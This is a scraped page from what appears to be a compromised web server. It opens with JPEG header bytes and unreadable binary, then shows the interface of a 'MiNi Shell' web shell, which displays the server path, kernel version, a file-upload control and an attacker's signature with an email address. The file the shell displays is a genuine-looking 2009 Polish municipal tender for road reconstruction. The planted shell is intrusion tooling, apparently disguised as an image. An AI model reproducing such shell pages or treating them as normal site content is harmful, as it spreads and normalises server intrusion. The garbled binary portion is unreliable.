JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091019/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091019/365140-N-2009.html

<p class="kh_header"><b>Nowogrodziec: Przebudowa dróg gminnych w miejscowościach Gierałtów - dz. nr 255, Zagajnik - dz. nr 108, Czerna - dz. nr 750.</b><br>
<b>Numer ogłoszenia: 365140 - 2009; data zamieszczenia: 19.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Nowogrodziec , ul. Rynek 1, 59-730 Nowogrodziec, woj. dolnośląskie, tel. 075 7380660, faks 075 7316416.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowogrodziec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych w miejscowościach Gierałtów - dz. nr 255, Zagajnik - dz. nr 108, Czerna - dz. nr 750..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest I etap prac związanych z przebudową dróg gminnych w
miejscowościach Gierałtów, Zagajnik i Czerna w następującym zakresie:
Droga gminna w Gierałtowie- dz. nr 255, dł. całkowita 0,400 km, szer. podbudowy piaskowotłuczniowej
3,1-3,2 m, dł. nawierzchni asfaltowej- 0,130 km, szer. 3,0 m. Zadanie obejmuje
min.:
a) Roboty przygotowawcze :
.roboty pomiarowe przy liniowych robotach ziemnych- trasa dróg w terenie równinnym-
0,400 km
.mechaniczne plantowanie poboczy- gr. ścinania 10 cm
.mechaniczne korytowanie na gł. 30 cm oraz 10 cm na całej szerokości jezdni i
chodników
.korytowanie na gł. 20 cm na poszerzeniach jezdni lub chodników
.roboty ziemne z transportem uprzednio zmagazynowanego urobku
b) Podbudowę piaskowo- tłuczniową:
.warstwy odsączające o gr. 10 cm wykonane i zagęszczane mechanicznie
.warstwa dolna podbudowy z kruszyw łamanych gr. 10 cm
.warstwa górna podbudowy z kruszyw łamanych gr. 10 cm oraz 15 cm
.wyrównanie istniejącej podbudowy tłuczniem kamiennym gr. 10 cm
c) Nawierzchnię asfaltową:
.mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno- bitumiczną
asfaltową
.nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o gr. 3 cm oraz 4 cm
.dodatek za transport -1 km ponad 5 km
d) Odwodnienie:
.rowki pod krawężniki i ławy krawężnikowe 30x30 cm
.krawężniki betonowe wystające15x30 cm z wyk. ław betonowych na podsypce
cementowo-piaskowej
.roboty ziemne z transportem uprzednio zmagazynowanego urobku
2) Droga gminna w Zagajniku- dz. nr 108 , dł. 1,000 km, szer. podbudowy tłuczniowej 2,9-3,0
m, dł. nawierzchni asfaltowej 0,445 km, szer. 2,8 m . Zadanie obejmuje min.:
a) Roboty przygotowawcze :
.roboty pomiarowe przy liniowych robotach ziemnych- trasa dróg w terenie równinnym-
1,000 km
.mechaniczne plantowanie poboczy- gr. ścinania 10 cm
.mechaniczne profilowanie i zagęszczanie podłoża
.korytowanie na gł.10 cm na poszerzeniach jezdni i chodników
.roboty ziemne z transportem uprzednio zmagazynowanego urobku
b) Podbudowę tłuczniową:
.warstwa dolna podbudowy z kruszyw łamanych gr. 10 cm
.warstwa górna podbudowy z kruszyw łamanych gr. 10 cm oraz gr.15 cm
.wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym gr. 10 cm
c) Nawierzchnię asfaltową:
.mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno- bitumiczną
asfaltową
.nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o gr. 3 cm oraz o gr. 4
cm
.dodatek za transport -1 km ponad 5 km
d) Odwodnienie:
.rowki pod krawężniki i ławy krawężnikowe 30x30 cm
.krawężniki betonowe wystające15x30 z wyk. ław betonowych na podsypce
cementowo-piaskowej
.wykopy liniowe o szer. 0,8-2,5 m i gł. 1,5 m o ścianach pionowych
.ścieki z elementów betonowych o gr. 15 cm na podsypce cementowo-piaskowej
.ręczne rozplantowanie ziemi wydobytej z wykopów przy 1 m3 ziemi na 1 m wykopu
.regulacja pionowa studzienek dla urządzeń podziemnych (obj. betonu od 0,1-0,2 m3)
3) Droga gminna w Czernej- dz. nr 750, dł. całkowita 0,508 km, szer. podbudowy tłuczniowej
3,4 m, dł. nawierzchni asfaltowej 0,390 km, szer. 3,2 m, . Zadanie obejmuje min.:
a) Roboty przygotowawcze :
.mechaniczne karczowanie zagajników gęstych pow. 60% powierzchni
.oczyszczanie terenu po karczowaniu
.mechaniczne ścinanie drzew z karczowaniem pni o średnicy: 10-15 cm, 16-25 cm,
26-35 cm, 36-45 cm, 66-75 cm
.wywożenie: dłużyc, karpiny- na odległość do 2 km
.wywożenie na odległość do 2 km korzeni i pni o średnicy jak wyżej
.usunięcie i spalenie pozostałości po karczunku
.mechaniczne plantowanie poboczy o gr. ścinania 10 cm
.korytowanie na gł.10 cm na poszerzeniach jezdni lub chodników
.roboty ziemne wykonane koparkami, z transportem uprzednio zmagazynowanego
urobku
.mechaniczne profilowanie i zagęszczanie podłoża
b) nawierzchnię i podbudowę tłuczniową:
.wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym o gr. ponad10
cm
.warstwa górna podbudowy z kruszyw łamanych o gr.15 cm
.wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym o gr. do 10 cm
c) Nawierzchnię asfaltową:
.mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno- bitumiczną
asfaltową
.nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o gr. 3 cm oraz o gr. 4
cm
.dodatek za transport -1 km ponad 5 km
d) Odwodnienie:
.oczyszczanie przepustów o średnicy 0,4 z namułu oraz rowów z wyprofilowaniem dnai skarp z namułu gr. 20cm
.roboty ziemne z transportem uprzednio zmagazynowanego urobku
.mechaniczne plantowanie skarpi dna wykopów
.rozbieranie przepustów rurowych
.wywiezienie gruzu z terenu rozbiórki
.wykopy oraz przekopy
.przepusty rurowe- ławy fundamentowe żeliwne, przepusty rurowe pod zjazdami
.kanały z rur PCV o średnicy zewn, 400 oraz 315
.zasypywanie wykopów o ścianach pionowych o szer. 0.8-2,5 m i głęb. 1,5 m
.wykopy liniowe o szer. 0,8-2,5 m i gł. 1,5 m o ścianach pionowych
.umocnienie skarp płytami chodnikowymi
.studnie chłonne z kręgów o średnicy 1.0 m i głębokości 3 m
.ręczne rozplantowanie ziemi wydobytej z wykopów przy 1 m3 ziemi na 1 m wykopu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-9, 45.23.32.26-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:
8 000,00 PLN (osiem tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki
udziału w postępowaniu:
1) posiadać uprawnienia do wykonywania działalności lub czynności oraz nie podlegać
wykluczeniu na podstawie art. 24 u.p.z.p.
2) posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym iosobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3) znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia -nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki
udziału w postępowaniu:
1) posiadać uprawnienia do wykonywania działalności lub czynności oraz nie podlegać
wykluczeniu na podstawie art. 24 u.p.z.p. W celu potwierdzenia spełniania niniejszego
warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru
lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż
6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego
ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej
Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego
z nich),
b)aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego
oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia
Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem
podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub
zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania
ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia
przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe
dokumenty dla każdego z nich),
c)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24
ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego
zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone
przedmiotowe dokumenty dla każdego z nich),
d)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24
ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego
zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone
przedmiotowe dokumenty dla każdego z nich);
2) posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i
osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne
zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych
do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące
warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o
udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i
kadrowy oraz łączne kwalifikacje i doświadczenie):
a) Wykonawca musi wykazać, że zrealizował (rozpoczął i zakończył realizację) w okresie ostatnich
5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, co najmniej trzy roboty dotyczące budowy, remontu lub
przebudowy dróg, na kwotę nie mniejszą niż 200 000,00 PLN każda.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć
wykaz wykonanych robót sporządzony według wzoru stanowiącego Załącznika nr 3 do niniejszej
IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie.
b) Zapewnić Kierownika robót budowlanych dysponującego odpowiednimi uprawnieniami
budowlanymi określonymi przepisami Prawa Budowlanego (branża konstrukcyjno - budowlana lub
drogowa) oraz będącego członkiem właściwej Izby Inżynierów Budownictwa.
3) znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego
zamówienia.
a) Posiadać polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
gospodarczej, zgodnej z przedmiotem niniejszego zamówienia, na kwotę nie mniejszą
niż 300 000,00 zł.
2.Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie
rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te
dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza
terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w:
1)pkt. 10.1.1).a), 10.1.1).b) i 10.1.1).d), składa dokument lub dokumenty, wystawione w kraju,
w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i
zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
organu;
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2)pkt 10.1.1).c) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju
pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p.
3.Stosownie do treści § 2 ust. 2 powołanego powyżej rozporządzenia Prezesa Rady Ministrów,
dokumenty, o których mowa powyżej w pkt 10.2.1)a) i c) oraz 10.2.2) powinny być wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Natomiast dokument, o którym
mowa powyżej w pkt 10.2.1)b), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.Stosownie do treści § 2 ust. 3 powołanego powyżej rozporządzenia Prezesa Rady Ministrów, jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt. 9.2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia pkt 10.3. IDW znajdują odpowiednie zastosowanie.
5.W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż określono w pkt 10.1.2)-3), Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kursu tej waluty ogłoszony przez NBP z dnia ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Ten sam kurs Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowogrodźcu 
Punkt Obsługi Interesanta pokój nr 1
59-730 Nowogrodziec 
ul. Rynek 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2009 godzina 10:00, miejsce: Urząd Miejski w Nowogrodźcu 
Punkt Obsługi Interesanta pokój nr 1
59-730 Nowogrodziec 
ul. Rynek 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com